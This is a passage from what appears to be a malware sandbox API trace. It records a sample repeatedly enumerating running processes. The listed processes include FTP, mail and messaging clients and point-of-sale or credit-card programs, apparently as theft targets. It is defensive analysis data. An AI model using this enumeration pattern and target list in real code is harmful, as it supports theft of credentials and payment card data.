hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0189.388] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0189.390] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0189.392] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0189.395] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0189.397] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0189.398] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0189.401] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0189.403] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0189.404] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0189.406] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0189.457] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0189.458] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0189.460] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0189.461] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0189.463] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0189.465] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0189.466] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0189.467] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0189.469] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0189.470] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0189.473] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0189.475] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0189.477] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0189.479] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0189.480] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0189.483] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0189.485] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0189.487] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0189.489] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0189.532] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0189.548] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0189.560] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0189.562] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0189.564] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0189.566] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0189.568] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0189.570] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0189.572] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0189.574] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0189.576] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0189.577] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0189.579] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0189.581] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0189.583] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0189.585] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0189.587] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0189.588] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0189.655] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0189.657] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0189.659] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0189.661] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0189.662] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0189.664] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0189.666] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0189.668] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0189.669] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0189.671] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0189.673] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0189.674] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0189.676] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0189.678] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0189.679] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0189.681] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0189.683] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0189.685] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0189.691] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0189.692] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0189.715] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0189.725] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0189.731] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0189.743] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0189.745] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0189.747] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0189.748] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0189.750] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0189.752] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0189.754] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0189.755] CloseHandle (hObject=0x17ec) returned 1 [0189.755] Sleep (dwMilliseconds=0x64) [0189.783] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0189.843] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.845] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0189.847] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0189.848] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 